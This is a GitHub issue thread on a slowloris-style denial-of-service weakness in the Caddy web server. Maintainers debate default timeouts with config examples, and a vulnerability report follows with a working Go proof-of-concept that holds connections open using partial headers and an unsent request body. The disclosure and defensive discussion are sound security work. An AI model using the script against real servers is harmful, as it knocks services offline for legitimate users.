DoS vulnerability in Caddy via slow HTTP requests #6663
Comments
You can configure timeouts to deal with this: https://caddyserver.com/docs/caddyfile/options#timeouts
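For concreteness, a global options block along these lines enables those timeouts (the values here are illustrative, not recommendations; see the linked docs for the full set of options):

```
{
	servers {
		timeouts {
			read_header 10s
			read_body   30s
			write       1m
			idle        2m
		}
	}
}
```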
What's the argument against setting sane defaults, like Nginx does?
Well, this is nothing new. Even with all the timeouts in the world, it's impossible to prevent DoS without additional infrastructure. All you can do with a single server is push the limit upward as the number of connections grows, and that plateaus until you just plain have more resources than the baddies. Caddy does set a sane idle timeout by default, which drops unused connections; that can be done without much collateral damage, hence we do it. Read and write timeouts are risky to set by default because they adversely affect clients with slow Internet connections, which is the opposite of what we want to do, and in fact harmful if those clients can't access information they need. If even a small percentage of the population of Australia, or remote parts of Africa, or some island in the Pacific all wanted to load your site at once, perhaps during a national emergency, your timeouts would likely sever their access, and from the server's side it would be nearly indistinguishable from a "slowloris" attack.

Setting balanced timeouts only makes slowloris incrementally, not orders of magnitude, more expensive, so it's not really effective. If someone can't slowloris you with 10 machines because you set timeouts, they probably could with ~30-50. You could set more aggressive timeouts to raise that cost to 100-500 machines, and then maybe you're starting to make a dent, but you've also just cut off half your legitimate users. An idle timeout of 75s will also hurt your site's performance, btw: if a user stays on a page for more than ~1.25 minutes, they have to reconnect after clicking a link, which expends more server resources, ironically doing the opposite of what you intend.

Point is, whether we ship default timeouts or not, you should set timeouts based on your own situation and requirements. Any choice of defaults either disconnects legitimate clients or leaves slowloris feasible (just not free). We simply assume that most traffic is benign by default (and it is). If you really want to prevent DoS attacks, have more resources than the bad guys. Hence services like Cloudflare exist.
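For background on what those knobs actually govern: Caddy's HTTP server is built on Go's net/http, so the timeouts above correspond to the standard http.Server fields. A minimal stand-alone sketch in plain net/http (not Caddy's actual wiring; values are illustrative):

```go
package main

import (
	"fmt"
	"net/http"
	"time"
)

func main() {
	srv := &http.Server{
		Addr: ":8080",
		// Maximum time to read the request headers; this is what blunts
		// slow-header (slowloris-style) requests.
		ReadHeaderTimeout: 10 * time.Second,
		// Maximum time to read the whole request, body included.
		ReadTimeout: 30 * time.Second,
		// Maximum time to write the response.
		WriteTimeout: 1 * time.Minute,
		// How long a keep-alive connection may sit unused before being closed.
		IdleTimeout: 2 * time.Minute,
		Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			fmt.Fprintln(w, "hello")
		}),
	}
	srv.ListenAndServe()
}
```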
No question, absolutely, we all agree that good implementors should tune these things to their own patterns, risk, and usage. But Caddy is generally wonderful in its defaults.
I find this argument inconsistent considering the defaults on TLS and ciphers! The TLS 1.2 minimum with a strong cipher suite is wonderful for new users because it's usually the right choice, but it also shuts out plenty of antiquated clients, including users who may not be able to upgrade to a modern device. Part of Caddy's appeal to both hobby users and corporations is that the defaults are safe, strong, and secure. Surely an unlimited read_header timeout isn't consistent with that approach.
The difference between security protocols and timeouts is that allowing clients to connect with weak security protocols does them harm, but servicing legitimately slow clients does them a benefit.
Last question and then I'll drop it: do you believe a default read_header timeout would be a reasonable compromise?
Fair question. (That timeout is relatively new btw, only being introduced after the last discussions we had about default timeouts IIRC.) I'm open to considering that and giving it a shot. We've trialed default timeouts before and it kind of backfired. |
Summary
A Denial of Service (DoS) vulnerability exists in Caddy, allowing an attacker to exhaust the server’s process pool by sending slow HTTP requests. This prevents legitimate clients from receiving any response.
Details
Caddy has a limited pool of processes dedicated to handling incoming HTTP requests. Each request is assigned to a process, and the process remains occupied until the request is fully completed. By sending a series of slow HTTP requests (a technique often referred to as Slowloris), an attacker can hold all available processes hostage, effectively preventing the server from handling new incoming requests.
In testing, the number of requests required to exhaust the pool under the default configuration appears to be tied to the number of available CPU cores, which is often low enough to make this attack feasible with minimal resources.
Another attack vector involves sending an HTTP request with a `Content-Length` header but without immediately sending the body. Since the server expects the body to match the declared `Content-Length`, it keeps the process occupied, waiting for data that never arrives. This tactic, combined with the slow requests described earlier, can similarly exhaust all available processes, leading to a denial of service.
PoC
This proof of concept demonstrates how sending slow requests can bring down the server.
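The original script wasn't included in this capture of the report, so the following is only a sketch of the technique described above; the target address, connection count, and timings are assumptions:

```go
// Sketch of a slow-request client along the lines described in the report.
package main

import (
	"fmt"
	"net"
	"time"
)

func main() {
	target := "localhost:80" // hypothetical target; point at the server under test
	conns := make([]net.Conn, 0, 200)

	// Open many connections and send only a partial request on each.
	for i := 0; i < 200; i++ {
		c, err := net.Dial("tcp", target)
		if err != nil {
			continue
		}
		// Declare a body that is never sent (the Content-Length variant) and
		// leave the header section unterminated (the slow-header variant).
		fmt.Fprintf(c, "POST / HTTP/1.1\r\nHost: %s\r\nContent-Length: 1000\r\n", target)
		conns = append(conns, c)
	}

	// Trickle one extra header line per connection every few seconds so the
	// requests never complete but the connections never look idle.
	for {
		for _, c := range conns {
			fmt.Fprintf(c, "X-Padding: %d\r\n", time.Now().Unix())
		}
		time.Sleep(10 * time.Second)
	}
}
```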
Impact
This vulnerability significantly impacts the server's availability, making it unable to respond to legitimate HTTP clients. Attackers can perform a low-effort Denial of Service (DoS) by sending slow requests or by using the `Content-Length` header without sending the body. These attacks effectively take down the server without requiring large amounts of bandwidth or computational power. As a result, this could disrupt services for extended periods, depending on the number of processes and the server's configuration.